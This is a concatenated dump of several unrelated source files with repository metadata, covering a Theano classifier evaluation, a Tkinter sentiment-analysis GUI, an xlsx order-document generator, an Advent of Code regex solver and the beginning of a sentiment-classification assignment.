i = numpy.ndarray((1,23), buffer=vector)
prediction = test_functionConfuse(i)[0]
print('prediction', prediction)
print('true',ys[idx])
# print('difference',(ys[idx]-prediction))
y_pred.append(prediction)
y_true.append(ys[idx])
# difference.append((ys[idx]-prediction))
cm=confusion_matrix(y_true,y_pred)
print(cm)
# successRate=str(float(correct)/len(ys))
# print('SuccessRate is: ',successRate)
print('y_pred: ',len(y_pred))
print('y_true: ',len(y_true))
print('difference',difference)
y_true=[]
y_pred=[]
missClassified=[]
correct = 0
xs = test_set_x.eval()
ys = test_set_y.eval()
test_functionMissCatigorised=theano.function(inputs=[x],outputs=classifier.logRegressionLayer.y_pred)
for idx, vector in enumerate(xs):
i = numpy.ndarray((1,23), buffer=vector)
prediction = test_functionMissCatigorised(i)[0]
if prediction != ys[idx]:
missClassified.append(prediction)
missClassified.append(ys[idx])
# print('mass classified :',missClassified)
# print('prediction11', prediction)
y_pred.append(prediction)
y_true.append(ys[idx])
successRate=str(float(correct)/len(ys))
cm=confusion_matrix(y_true,y_pred)
print(cm)
# df_confusion = pd.crosstab(y_true, y_pred)
# print(df_confusion)
# df_confusion = pd.crosstab(y_true, y_pred, rownames=['Actual'], colnames=['Predicted'], margins=True)
with open('creditFile.csv', 'w') as f:
writer = csv.writer(f, delimiter='\t')
writer.writerows(zip(y_pred,y_true))
# print('miss classified :',missClassified)
if __name__ == '__main__':
test_mlp()
| [
"brian1760@hotmail.co.uk"
] | brian1760@hotmail.co.uk |
0a73a141621ba3d032ac2f6b9c9fbec5f12eabb2 | d44e7d85d4d8c601965c3dfdd09937b76b292d6f | /practice_06_03.py | f8ad37f3be0898e5a5170b244a3c59ad40a1ec80 | [] | no_license | Jean-1220/study_python | 84a0a34c0f7a16f13288871b5c1f4ec26b013d1a | 3bddf1d28875ddf69769b82dd7fc07be46bbb551 | refs/heads/master | 2023-04-28T15:29:03.732120 | 2021-05-25T08:38:02 | 2021-05-25T08:38:02 | 367,266,186 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 499 | py | #함수_기본값
# def profile(name, age, main_lang) :
# print("이름 : {0}\t나이 : {1}\t주 사용 언어 : {2}" \
# .format(name, age, main_lang))
# profile("유재석", 20, "파이썬")
# profile("김태호", 25, "자바")
#같은 학교 같은 학년 같은 반 같은 수업
def profile(name, age=17, main_lang="파이썬") :
print("이름 : {0}\t나이 : {1}\t주 사용 언어 : {2}" \
.format(name, age, main_lang))
profile("유재석")
profile("김태호") | [
"123sijin@sookmyung.ac.kr"
] | 123sijin@sookmyung.ac.kr |
cdfae9f0ea4d063ab1de30e02515f2d263d6592c | 74461144ed60c9211575b99c483f9f6b970ecf54 | /tesilm_sa/main.py | 1841b62d8a88c63d988f1f9952b8f1056cd69f36 | [] | no_license | mmilidoni/tesilm | 8bbd8a84139c79a42b8cc392477d2df441edbaf7 | 70d92d8fa87be446a17c6a257bbb41e9caedadd4 | refs/heads/master | 2021-01-22T04:09:33.262358 | 2017-05-24T22:31:10 | 2017-05-24T22:31:10 | 81,505,250 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,659 | py | from ScrolledText import ScrolledText
from Tkinter import *
from politician import Politician
from etl import Etl
from tweetprocessor import TweetProcessor
class App:
def __init__(self, master):
self.tweetProcessorObject = TweetProcessor()
self.politicianObject = Politician()
# tweet processor frame
rowTweetProcessor = 0
tweetProcessorFrame = LabelFrame(master, text="Tweet Processor")
tweetProcessorFrame.grid(row=rowTweetProcessor, column=0)
## add tweet
lblAddTweet = Label(tweetProcessorFrame, text="Add Tweet (json): ",
anchor='w', justify='left')
self.txtAddTweet = Text(tweetProcessorFrame, height=10)
lblAddTweet.grid(row=0, column=0)
self.txtAddTweet.grid(row=1, column=0)
btnAddTweet = Button(tweetProcessorFrame, text="Add", command=self.addTweet)
btnAddTweet.grid(row=2, column=0)
btnExportGephi = Button(tweetProcessorFrame, text="Export Gephi file (*.gexf)", command=self.exportGephi)
btnExportGephi.grid(row=3, column=0)
# politician frame
rowPolitician = 1
politicianFrame = LabelFrame(master, text="Politician")
politicianFrame.grid(row=rowPolitician, column=0)
## add politician
lblAddPolitican = Label(politicianFrame, text="Add Politician (dbpedia URI): ",
anchor='w', justify='left')
self.entryAddPolitician = Entry(politicianFrame, width=40)
lblAddPolitican.grid(row=0, column=0)
self.entryAddPolitician.grid(row=0, column=1)
btnAddPolitician = Button(politicianFrame, text="Add", command=self.addPolitician)
btnAddPolitician.grid(row=0, column=2)
## list politicians
btnListPoliticians = Button(politicianFrame, text="List", command=self.listPoliticians)
btnListPoliticians.grid(row=1, column=0, columnspan=3)
# output frame
rowOutputFrame = 2
outputFrame = LabelFrame(master, text="Output")
outputFrame.grid(row=rowOutputFrame, column=0, sticky=W + E + N + S)
self.txtOutputFrame = ScrolledText(outputFrame, width=160)
self.txtOutputFrame.pack(fill=BOTH, expand=1)
self.txtOutputFrame.config(wrap=NONE)
def addTweet(self):
try:
output = self.tweetProcessorObject.process(self.txtAddTweet.get(1.0, END))
if len(output) == 0:
out = "Match politician <-> tweet not found"
else:
out = ""
out += str(len(output)) + " sentiments added\n"
out += "-------- DETAILS ------------\n"
for [politician, sentiment] in output:
out += "Politician: " + politician["familyName"] + " " + politician["givenName"] + "\n"
out += sentiment.upper() + " sentiment\n"
out += "-------------------------------\n"
self.writeOutput(out)
except Exception as eDetail:
self.writeOutput(eDetail)
raise
def addPolitician(self):
try:
if self.politicianObject.add(self.entryAddPolitician.get()):
self.writeOutput("Politician added")
else:
self.writeOutput("Internal error")
except Exception as eDetail:
self.writeOutput(eDetail)
raise
def exportGephi(self):
e = Etl()
from tkFileDialog import asksaveasfilename
import tkMessageBox
filename = asksaveasfilename()
if e.exportGephi(filename):
tkMessageBox.showinfo("Info", "File salvato con successo.")
def listPoliticians(self):
out = ""
for politician in self.politicianObject.getRawList():
out += politician
self.writeOutput(out)
def writeOutput(self, text):
#self.txtOutputFrame.config(state=NORMAL)
self.txtOutputFrame.delete(1.0, END)
self.txtOutputFrame.insert(END, text)
#self.txtOutputFrame.config(state=DISABLED)
def center(toplevel):
toplevel.update_idletasks()
w = toplevel.winfo_screenwidth()
h = toplevel.winfo_screenheight()
size = tuple(int(_) for _ in toplevel.geometry().split('+')[0].split('x'))
x = w / 2 - size[0] / 2
y = h / 2 - size[1] / 2
toplevel.geometry("%dx%d+%d+%d" % (size + (x, y)))
root = Tk()
root.title("Twitter Sentiment Analysis Manager")
#root.minsize(800, 400)
App(root)
center(root)
root.mainloop()
#if __name__ == "__main__":
# pt = TweetProcessor()
# pt.process('{"created_at":"Sat Aug 21 06:30:00 +0000 2015","id":627365646456623104,"id_str":"627365646456623104","text":"Bill Clinton is terrible!","truncated":false,"in_reply_to_status_id":null,"in_reply_to_status_id_str":null,"in_reply_to_user_id":null,"in_reply_to_user_id_str":null,"in_reply_to_screen_name":null,"user":{"id":2394398282,"id_str":"2394398282","name":"\u5c11\u5e74\u53f8\u4ee4\u5b98@\u30ea\u30af","screen_name":"lockon85193738","location":"","url":null,"description":"\u4e16\u754c\u6700\u5f31\u306e\u7537","protected":false,"verified":false,"followers_count":158,"friends_count":204,"listed_count":12,"favourites_count":2243,"statuses_count":13637,"created_at":"Mon Mar 17 13:28:08 +0000 2014","utc_offset":null,"time_zone":null,"geo_enabled":false,"lang":"en","contributors_enabled":false,"is_translator":false,"profile_background_color":"C0DEED","profile_background_image_url":"http:\/\/abs.twimg.com\/images\/themes\/theme1\/bg.png","profile_background_image_url_https":"https:\/\/abs.twimg.com\/images\/themes\/theme1\/bg.png","profile_background_tile":false,"profile_link_color":"0084B4","profile_sidebar_border_color":"C0DEED","profile_sidebar_fill_color":"DDEEF6","profile_text_color":"333333","profile_use_background_image":true,"profile_image_url":"http:\/\/pbs.twimg.com\/profile_images\/626315196970110976\/GDt0wiOG_normal.jpg","profile_image_url_https":"https:\/\/pbs.twimg.com\/profile_images\/626315196970110976\/GDt0wiOG_normal.jpg","profile_banner_url":"https:\/\/pbs.twimg.com\/profile_banners\/2394398282\/1438160154","default_profile":true,"default_profile_image":false,"following":null,"follow_request_sent":null,"notifications":null},"geo":null,"coordinates":null,"place":null,"contributors":null,"retweet_count":0,"favorite_count":0,"entities":{"hashtags":[],"trends":[],"urls":[],"user_mentions":[],"symbols":[]},"favorited":false,"retweeted":false,"possibly_sensitive":false,"filter_level":"low","lang":"en","timestamp_ms":"1438410600662"}')
| [
"michelemilidoni@gmail.com"
] | michelemilidoni@gmail.com |
7c195dbd7c5521e6969608c34feec58e6f8d2e51 | e0725eb2a9f3582afc3421fa43a89ac1eba404ea | /user/models.py | ef26a1a73fabb1b531d9140bab7f1fb317ee1ca8 | [] | no_license | Dannykl/crud_operation_in_django | 31235965b5bbd9ffaa882e372ea8a408ce3c6da1 | d68e70587b22b593295782d3701e38b153d1dd4f | refs/heads/master | 2021-08-30T18:40:41.061334 | 2021-08-17T11:48:55 | 2021-08-17T11:48:55 | 173,336,608 | 0 | 0 | null | 2021-08-17T11:49:35 | 2019-03-01T16:46:16 | Python | UTF-8 | Python | false | false | 146 | py | # Create your models here.
from django.db import models
from django.contrib.auth.models import AbstractUser
class User(AbstractUser):
pass
| [
"Danielniguse8@gmail.com"
] | Danielniguse8@gmail.com |
3d5421e76fe33f582359aeafedc29fae2292199a | 843f44309d466aff357d041023c45028d1e9c3c2 | /app/docs.py | 4cd0271f06ef4931a2e8469a57e3b95e66a9b51f | [] | no_license | raphaelcjamarante/app-pharmashopi | 375faf014834e72e9a6d2c84802a34c04b9593bf | 4df103aa3875c2969ef5d1ea42f3c9bd4760ce63 | refs/heads/master | 2020-06-30T01:46:18.407274 | 2019-08-26T12:51:35 | 2019-08-26T12:51:35 | 200,683,155 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,705 | py | # -*- coding: utf-8 -*-
from barcode.writer import ImageWriter
import barcode
import datetime
import os
import unicodedata
import xlsxwriter
import app.log
import app.utilities
logger = app.log.setup_logger(__name__)
#------------------------------------------------------------
def cell_format(workbook, mode, livraison):
""" Crée les celules xlsx
Parameters
----------
workbook : objet xlsx
Fichier xlsx utilisé
mode : str
Selectionne le mode : picking ou bonprep
livraison : str
Selectionne le type de livraison
Return
------
cells : dict
Dictionnaire avec les formats de celules
"""
cells = {}
cell_format2 = workbook.add_format({'text_wrap': True})
cell_format2.set_border(7)
cell_format2.set_align('center')
cell_format2.set_align('vcenter')
cells["2"] = cell_format2
cell_format3 = workbook.add_format({'text_wrap': True})
cell_format3.set_bold()
cell_format3.set_border(7)
cell_format3.set_align('center')
cell_format3.set_align('vcenter')
cells["3"] = cell_format3
cell_format6 = workbook.add_format({'text_wrap': True})
cell_format6.set_bold()
cell_format6.set_border(7)
cell_format6.set_font_size(17)
cell_format6.set_align('center')
cell_format6.set_align('vcenter')
cells["6"] = cell_format6
cell_format7 = workbook.add_format({'text_wrap': True})
cell_format7.set_bold()
cell_format7.set_border(7)
cell_format7.set_font_size(6)
cell_format7.set_align('center')
cell_format7.set_align('vcenter')
cells["7"] = cell_format7
if mode == "picking":
cell_format2bis = workbook.add_format({'text_wrap': True})
cell_format2bis.set_border(7)
cell_format2bis.set_align('center')
cell_format2bis.set_align('vcenter')
cell_format2bis.set_font_strikeout()
cells["2bis"] = cell_format2bis
cell_format3bis = workbook.add_format({'text_wrap': True})
cell_format3bis.set_bold()
cell_format3bis.set_border(7)
cell_format3bis.set_align('center')
cell_format3bis.set_align('vcenter')
cell_format3bis.set_font_strikeout()
cells["3bis"] = cell_format3bis
cell_format4 = workbook.add_format({'text_wrap': True})
cell_format4.set_bold()
cell_format4.set_underline()
cell_format4.set_border(7)
cell_format4.set_align('center')
cell_format4.set_align('vcenter')
cells["4"] = cell_format4
cell_format6bis = workbook.add_format({'text_wrap': True})
cell_format6bis.set_bold()
cell_format6bis.set_border(7)
cell_format6bis.set_font_size(17)
cell_format6bis.set_align('center')
cell_format6bis.set_align('vcenter')
cell_format6bis.set_font_strikeout()
cells["6bis"] = cell_format6bis
if mode == "bonprep":
cell_format = workbook.add_format({'text_wrap': True})
cell_format.set_border(7)
cell_format.set_align('center')
cell_format.set_align('vcenter')
if livraison == 'Mondial Relay':
color = 'gray'
else:
color = 'white'
cell_format.set_bg_color(color)
cells["mondial"] = cell_format
cell_format11 = workbook.add_format({'text_wrap': True})
cell_format11.set_bold()
cell_format11.set_border(7)
cells["11"] = cell_format11
cell_format33 = workbook.add_format({'text_wrap': True})
cell_format33.set_bold()
cell_format33.set_border(7)
cell_format33.set_align('center')
cell_format33.set_align('vcenter')
cells["33"] = cell_format33
cell_format4 = workbook.add_format({'text_wrap': True})
cell_format4.set_font_size(10)
cell_format4.set_border(7)
cell_format4.set_align('vcenter')
cells["4"] = cell_format4
total_format = workbook.add_format({'text_wrap': True})
total_format.set_border(7)
total_format.set_align('right')
total_format.set_align('vcenter')
cells["total"] = total_format
cell_format9 = workbook.add_format({'text_wrap': True})
cell_format9.set_bold()
cell_format9.set_border(7)
cell_format9.set_font_size(13)
cell_format9.set_align('center')
cell_format9.set_align('vcenter')
cells["9"] = cell_format9
return cells
#------------------------------------------------------------
def picking_doc(batch, livraison):
""" Fait la documentation du picking
Parameters
----------
batch : Batch
Objet avec tous les donnes du batch
livraison : str
Selectionne le mode de livraison
"""
try:
workbook = xlsxwriter.Workbook(app.utilities.get_path("docs/Picking.xlsx"))
workbook.close()
except Exception:
logger.error("Fichier Picking.xlsx est ouvert. Fermez-le.")
logger.new_formatter("newline")
raise
print("Écriture Picking.xlsx...")
print("******************************************\n")
workbook = xlsxwriter.Workbook(app.utilities.get_path("docs/Picking.xlsx"))
cf = cell_format(workbook, "picking", livraison)
worksheet = workbook.add_worksheet()
worksheet.set_margins(0.2, 0.2, 0.2, 0.2)
worksheet.set_column(0, 0, 3)
worksheet.set_column(1, 1, 4)
worksheet.set_column(2, 2, 7)
worksheet.set_column(3, 3, 14)
worksheet.set_column(4, 4, 12)
worksheet.set_column(5, 5, 37)
worksheet.set_column(6, 6, 7)
worksheet.set_column(7, 7, 7)
path = app.utilities.get_path("docs/images/pharmashopi.png")
worksheet.insert_image('A3', path, {'x_scale': 0.5, 'y_scale': 0.5})
now = datetime.datetime.now()
worksheet.merge_range('B6:D7', f"Type livraison : {livraison}", cf["3"])
worksheet.write(2, 5, now.strftime("%A %d %b %Y"), cf["4"])
worksheet.write(3, 5, f"Heure : {now.strftime('%H:%M:%S')}", cf["4"])
worksheet.write(4, 5, "Bon de preparations : ", cf["4"])
worksheet.write(5, 5, batch.get_range(), cf["3"])
worksheet.write(6, 5, f"{batch.get_total_quantity()} produits", cf["3"])
worksheet.write(8, 1, 'Qte', cf["3"])
worksheet.write(8, 2, 'Stock', cf["3"])
worksheet.write(8, 3, 'Code barres', cf["3"])
worksheet.write(8, 4, 'Marque', cf["3"])
worksheet.write(8, 5, 'Article', cf["3"])
worksheet.write(8, 6, 'Options', cf["3"])
worksheet.write(8, 7, 'Prix(ht)', cf["3"])
row = 10
col = 0
for key in batch.prods_info:
prod = batch.prods_info[key]['product']
qte = batch.prods_info[key]['total_qte']
robot_stock = batch.prods_info[key]['robot_stock']
ref = key
if int(robot_stock) < qte:
worksheet.write(row, col, robot_stock, cf["2"])
worksheet.write(row, col + 1, qte, cf["6"])
worksheet.write(row, col + 3, ref, cf["3"])
worksheet.write(row, col + 5, prod.name, cf["2"])
else:
worksheet.write(row, col, robot_stock, cf["2bis"])
worksheet.write(row, col + 1, qte, cf["6bis"])
worksheet.write(row, col + 3, ref, cf["3bis"])
worksheet.write(row, col + 5, prod.name, cf["2bis"])
worksheet.write_string(row, col + 2, prod.get_stocks(), cf["2"])
worksheet.write(row, col + 4, prod.brand_name, cf["2"])
worksheet.write(row, col + 6, prod.get_options(), cf["7"])
worksheet.write(row, col + 7, round(prod.final_price, 2), cf["2"])
row += 1
workbook.close()
logger.info("Picking.xlsx écrit")
logger.new_formatter("newline")
#------------------------------------------------------------
def bonprep_doc(cmds, livraison):
""" Fait la documentation des bons de preparation
Parameters
----------
cmds :
Dictionnaire d'objets du type Commande
livraison : str
Selectionne le mode de livraison
"""
try:
workbook = xlsxwriter.Workbook(app.utilities.get_path("docs/BonCommande.xlsx"))
workbook.close()
except Exception:
logger.error("Fichier BonCommande.xlsx est ouvert. Fermez-le.")
logger.new_formatter("newline")
raise
print("Écriture BonCommande.xlsx...")
print("******************************************\n")
workbook = xlsxwriter.Workbook(app.utilities.get_path("docs/BonCommande.xlsx"))
cf = cell_format(workbook, "bonprep", livraison)
ean_index = 0
list_cmds = list(cmds.values())
list_cmds = sorted(list_cmds, key=lambda k: k.id)
for cmd in list_cmds:
date = cmd.get_date_created(mode='barcode')
strdate = cmd.get_date_created(mode='string')
EAN = barcode.get_barcode_class('ean13')
ean = EAN(str(cmd.id) + date, writer=ImageWriter())
path = app.utilities.get_path("docs/barcodes/ean13" + str(ean_index))
filename = ean.save(path)
worksheet = workbook.add_worksheet()
worksheet.set_margins(0.2, 0.2, 0.2, 0.2)
worksheet.set_column(0, 0, 4)
worksheet.set_column(1, 1, 5)
worksheet.set_column(2, 2, 13.5)
worksheet.set_column(3, 3, 11.5)
worksheet.set_column(4, 4, 30)
worksheet.set_column(5, 5, 6.5)
worksheet.set_column(6, 6, 7)
worksheet.set_column(7, 7, 6)
worksheet.set_column(8, 8, 6)
path = app.utilities.get_path("docs/images/pharmashopi.png")
worksheet.insert_image('B2', path, {'x_scale': 0.45, 'y_scale': 0.45})
path = app.utilities.get_path("docs/barcodes/ean13" + str(ean_index) + ".png")
worksheet.insert_image('G2', path, {'x_scale': 0.25, 'y_scale': 0.25})
ean_index += 1
worksheet.merge_range('A7:C8', 'Commande : ' + cmd.id, cf["9"])
worksheet.merge_range('A9:C9', 'Numero client : ' + cmd.customer.id, cf["3"])
worksheet.merge_range('A10:C10', 'Date : ' + strdate, cf["3"])
worksheet.merge_range('A11:C12', cmd.payment.method_name, cf["3"])
worksheet.merge_range('A13:C14', str(cmd.get_total_quantity()) + " articles", cf["9"])
worksheet.merge_range('F7:I7', "Adresse de livraison: ", cf["3"])
worksheet.merge_range('F8:I14', cmd.delivery_address.get_complete_address(), cf["4"])
row = 16
info_sante = cmd.get_sante()
for item in info_sante:
worksheet.merge_range(f"A{str(row)}:I{str(row)}", item, cf["11"])
row += 1
row += 1
worksheet.write(row, 0, 'Qte', cf["33"])
worksheet.write(row, 1, 'Notes', cf["33"])
worksheet.write(row, 2, 'Code barres', cf["33"])
worksheet.write(row, 3, 'Marque', cf["33"])
worksheet.write(row, 4, 'Article', cf["33"])
worksheet.write(row, 5, 'Options', cf["33"])
worksheet.write(row, 6, 'Poids', cf["33"])
worksheet.write(row, 7, 'Prix u HT', cf["33"])
worksheet.write(row, 8, 'Total TTC', cf["33"])
row += 1
col = 0
list_prods = list(cmd.products.values())
list_prods = sorted(list_prods, key=lambda k: k.brand_name)
list_prods.append(list_prods.pop(0)) # delivery 'product' is last
for prod in list_prods:
worksheet.write(row, col, prod.quantity, cf["6"])
worksheet.write(row, col + 1, " ", cf["2"])
worksheet.write(row, col + 2, prod.get_best_reference(), cf["3"])
worksheet.write(row, col + 3, prod.brand_name, cf["2"])
if livraison in prod.name and livraison == 'Mondial Relay':
worksheet.write(row, col + 4, prod.name, cf["mondial"])
else:
worksheet.write(row, col + 4, prod.name, cf["2"])
worksheet.write(row, col + 5, prod.get_options(), cf["7"])
worksheet.write(row, col + 6, str(round(prod.weight, 3)) + 'kg', cf["2"])
worksheet.write(row, col + 7, round(prod.final_price, 2), cf["2"])
worksheet.write(row, col + 8, round(prod.taxed_price * prod.quantity, 2), cf["2"])
row += 1
worksheet.merge_range(f"F{str(row + 3)}:G{str(row + 3)}", "Total HT: ", cf["3"])
worksheet.merge_range(f"F{str(row + 4)}:G{str(row + 4)}", "TVA: ", cf["3"])
worksheet.merge_range(f"F{str(row + 5)}:G{str(row + 5)}", "Total TTC: ", cf["3"])
worksheet.write(row + 2, 7, round(cmd.totalht, 2), cf["total"])
worksheet.write(row + 4, 7, round(cmd.totalttc, 2), cf["total"])
worksheet.write(row + 3, 7, round(cmd.totalttc - cmd.totalht, 2), cf["total"])
workbook.close()
logger.info("BonCommande.xlsx écrit")
logger.new_formatter("newline") | [
"39167880+raphaelcjamarante@users.noreply.github.com"
] | 39167880+raphaelcjamarante@users.noreply.github.com |
755972aa028be820773f38450b919438ab7b3f28 | f6783bf89012c2bdf31f485e6841b4a38b2c0993 | /scenes_params.py | 8db1dbdb055937e033af5f1417517ed3fbabbe92 | [
"MIT"
] | permissive | Elfoniok/rendering_analysis | 4bbb923ae2ad2b8d6d31c8cf51dd8ca3a0147ac6 | c171f0a3b8f240ecbf457d3c806745b11552b9bc | refs/heads/master | 2021-04-18T19:03:36.759589 | 2018-07-06T09:17:57 | 2018-07-06T09:17:57 | 126,380,726 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,830 | py | import os
## ======================= ##
##
class RenderParams:
## ======================= ##
##
def __init__( self ):
# Set default params.
self.seed = 100
self.inc_seed = 0
self.start = 4225
self.end = 6725
self.step = 100
self.width = 800
self.height = 600
params_map = dict()
# barcelona
params_map[ "barcelona" ] = RenderParams()
params_map[ "barcelona" ].width = 800
params_map[ "barcelona" ].height = 600
params_map[ "barcelona" ].start = 5125
params_map[ "barcelona" ].end = 8725
# bunkbed
params_map[ "bunkbed" ] = RenderParams()
params_map[ "bunkbed" ].width = 800
params_map[ "bunkbed" ].height = 600
params_map[ "bunkbed" ].start = 6025
params_map[ "bunkbed" ].end = 8225
# cat
params_map[ "cat" ] = RenderParams()
params_map[ "cat" ].width = 1600
params_map[ "cat" ].height = 1200
params_map[ "cat" ].start = 3825
params_map[ "cat" ].end = 5825
# habitacion
params_map[ "habitacion" ] = RenderParams()
params_map[ "habitacion" ].width = 800
params_map[ "habitacion" ].height = 600
params_map[ "habitacion" ].start = 2825
params_map[ "habitacion" ].end = 3325
# mug
params_map[ "mug" ] = RenderParams()
params_map[ "mug" ].width = 800
params_map[ "mug" ].height = 600
params_map[ "mug" ].start = 3825
params_map[ "mug" ].end = 6325
# plushy
params_map[ "plushy" ] = RenderParams()
params_map[ "plushy" ].width = 400
params_map[ "plushy" ].height = 300
params_map[ "plushy" ].start = 4225
params_map[ "plushy" ].end = 6725
# sea
params_map[ "sea" ] = RenderParams()
params_map[ "sea" ].width = 800
params_map[ "sea" ].height = 600
params_map[ "sea" ].start = 825
params_map[ "sea" ].end = 4025
# tree
params_map[ "tree" ] = RenderParams()
params_map[ "tree" ].width = 800
params_map[ "tree" ].height = 600
params_map[ "tree" ].start = 425
params_map[ "tree" ].end = 2225
## ======================= ##
##
def get_scene_name( path ):
return os.path.basename( os.path.dirname( path ) )
## ======================= ##
##
def get_scene_parameters( scene ):
try:
return params_map[ scene ]
except:
print( "Parameters for scene: [" + scene + "] aren't defined. Using default values. " )
return RenderParams()
## ======================= ##
##
def print_scene_parameters( params ):
print( "Width: " + str( params.width ) )
print( "Height " + str( params.height ) )
print( "Samples start: " + str( params.start ) )
print( "Samples end: " + str( params.end ) )
print( "Samples step: " + str( params.step ) )
print( "Seed: " + str( params.seed ) )
print( "Seed increment: " + str( params.inc_seed ) )
| [
"nieznany.sprawiciel@gmail.com"
] | nieznany.sprawiciel@gmail.com |
3e132af42b28d60681b4833daf0ba15ff7a60097 | 4ddb1cb60794f75b7f72074fee6002f4f7367043 | /day19.py | b8f1decb99fde318e6c670671ffac858fd028ce3 | [] | no_license | shamayn/aoc2020 | 25032c84843e5ccb4472bb762ea88ab91b04f249 | 3a81253f0825180615d64dd6dae57a8a1ca9d28c | refs/heads/main | 2023-02-15T08:54:59.214285 | 2021-01-18T02:39:40 | 2021-01-18T02:39:40 | 330,533,882 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,538 | py | import re
TEST_RULES = [
"0: 4 1 5",
"1: 2 3 | 3 2",
"2: 4 4 | 5 5",
"3: 4 5 | 5 4",
"4: \"a\"",
"5: \"b\"",
]
TEST_INPUT = [
"ababbb",
"bababa",
"abbbab",
"aaabbb",
"aaaabbb",
]
TEST_RULES_2 = [
"42: 9 14 | 10 1",
"9: 14 27 | 1 26",
"10: 23 14 | 28 1",
"1: \"a\"",
"11: 42 31",
"5: 1 14 | 15 1",
"19: 14 1 | 14 14",
"12: 24 14 | 19 1",
"16: 15 1 | 14 14",
"31: 14 17 | 1 13",
"6: 14 14 | 1 14",
"2: 1 24 | 14 4",
"0: 8 11",
"13: 14 3 | 1 12",
"15: 1 | 14",
"17: 14 2 | 1 7",
"23: 25 1 | 22 14",
"28: 16 1",
"4: 1 1",
"20: 14 14 | 1 15",
"3: 5 14 | 16 1",
"27: 1 6 | 14 18",
"14: \"b\"",
"21: 14 1 | 1 14",
"25: 1 1 | 1 14",
"22: 14 14",
"8: 42",
"26: 14 22 | 1 20",
"18: 15 15",
"7: 14 5 | 1 21",
"24: 14 1",
]
TEST_INPUT_2 = [
"abbbbbabbbaaaababbaabbbbabababbbabbbbbbabaaaa",
"bbabbbbaabaabba",
"babbbbaabbbbbabbbbbbaabaaabaaa",
"aaabbbbbbaaaabaababaabababbabaaabbababababaaa",
"bbbbbbbaaaabbbbaaabbabaaa",
"bbbababbbbaaaaaaaabbababaaababaabab",
"ababaaaaaabaaab",
"ababaaaaabbbaba",
"baabbaaaabbaaaababbaababb",
"abbbbabbbbaaaababbbbbbaaaababb",
"aaaaabbaabaaaaababaa",
"aaaabbaaaabbaaa",
"aaaabbaabbaaaaaaabbbabbbaaabbaabaaa",
"babaaabbbaaabaababbaabababaaab",
"aabbbbbaabbbaaaaaabbbbbababaaaaabbaaabba",
]
def validateMessages(rules, input):
ruledict = parseRules(rules)
print("rulesdict", ruledict)
regex = rulesToRegex(ruledict)
print("regex", regex)
sum = 0
for message in input:
sum += bool(regex.match(message))
print("sum", sum)
return sum
def validateMessages2(rules, input):
ruledict = parseRules(rules)
ruledict["8"] = "(?: 42 )+".split()
ruledict["11"] = ("(?: (?: (?: 42 ) {1} (?: 31 ) {1} ) | " \
+ "(?: (?: 42 ) {2} (?: 31 ) {2} ) | " \
+ "(?: (?: 42 ) {3} (?: 31 ) {3} ) | " \
+ "(?: (?: 42 ) {4} (?: 31 ) {4} ) | " \
+ "(?: (?: 42 ) {5} (?: 31 ) {5} ) | " \
+ "(?: (?: 42 ) {6} (?: 31 ) {6} ) | " \
+ "(?: (?: 42 ) {7} (?: 31 ) {7} ) | " \
+ "(?: (?: 42 ) {8} (?: 31 ) {8} ) | " \
+ "(?: (?: 42 ) {9} (?: 31 ) {9} ) )").split()
print("updated", ruledict)
regex = rulesToRegex(ruledict)
print("regex", regex)
sum = 0
for message in input:
sum += bool(regex.match(message))
print("sum", sum)
return sum
def parseRules(rule_list):
ruledict = dict()
for r in rule_list:
(key, value) = r.strip().split(":")
val = value.replace("\"", "")
if (val.find("|") > 0):
# turn into a regex
val = "(?: " + val + " )"
ruledict[key] = val.split()
return ruledict
def rulesToRegex(ruledict):
result = ruledict["0"].copy()
while any(x.isdigit() for x in result):
i, k = next((i,x) for (i, x) in enumerate(result) if x.isdigit())
result[i:i+1] = ruledict[k].copy()
result.insert(0, "^")
result.append("$")
return re.compile("".join(result))
def testValidateMessages():
result = 2
if validateMessages(TEST_RULES, TEST_INPUT) == result:
print("testValidateMessages Pass")
else:
print("testValidateMessages Fail")
def testValidateMessages2():
result = 12
if validateMessages2(TEST_RULES_2, TEST_INPUT_2) == result:
print("testValidateMessages2 Pass")
else:
print("testValidateMessages2 Fail")
def main():
# testValidateMessages()
#testValidateMessages2()
f = open('data/day19_input.txt', 'r')
lines = f.readlines()
rules = []
messages = []
for line in lines:
if line.find(":") != -1:
rules.append(line.strip())
elif len(line) > 0:
messages.append(line.strip())
#validateMessages(rules, messages)
validateMessages2(rules, messages)
if __name__ == '__main__':
main() | [
"shamayn@gmail.com"
] | shamayn@gmail.com |
7ea31f1d5cee13bb05992a54895bdc6027e86ed4 | 5deca81ecb729fdb1e14511b7fdb65e5f3b277de | /2_sentiment/submission_v3.py | 867249d65f4d33c72710ac1ca021d7e5f65d622c | [] | no_license | anatu/CS221-Fall2018 | 6a0e170ada7ba8794d9e93dee875fc1a072e4692 | 03dbcf7cb7da953877171b311be9d0e2aacec30c | refs/heads/master | 2021-03-20T06:01:52.122056 | 2020-03-14T00:22:10 | 2020-03-14T00:22:10 | 247,183,322 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,968 | py | #!/usr/bin/python
import random
import collections
import math
import sys
from util import *
############################################################
# Problem 3: binary classification
############################################################
############################################################
# Problem 3a: feature extraction
def extractWordFeatures(x):
"""
Extract word features for a string x. Words are delimited by
whitespace characters only.
@param string x:
@return dict: feature vector representation of x.
Example: "I am what I am" --> {'I': 2, 'am': 2, 'what': 1}
"""
# BEGIN_YOUR_CODE (our solution is 4 lines of code, but don't worry if you deviate from this)
features = dict()
for word in set(x.split(" ")):
features[word] = x.split(" ").count(word)
return features
# END_YOUR_CODE
############################################################
# Problem 3b: stochastic gradient descent
def learnPredictor(trainExamples, testExamples, featureExtractor, numIters, eta):
'''
Given |trainExamples| and |testExamples| (each one is a list of (x,y)
pairs), a |featureExtractor| to apply to x, and the number of iterations to
train |numIters|, the step size |eta|, return the weight vector (sparse
feature vector) learned.
You should implement stochastic gradient descent.
Note: only use the trainExamples for training!
You should call evaluatePredictor() on both trainExamples and testExamples
to see how you're doing as you learn after each iteration.
'''
weights = {} # feature => weight
# BEGIN_YOUR_CODE (our solution is 12 lines of code, but don't worry if you deviate from this)
for iteration in range(numIters):
# print("BEGINNING RUN NUMBER %i" % (iteration))
for example in trainExamples:
# Extract the features from the input
x = example[0]
y = example[1]
features = featureExtractor(x)
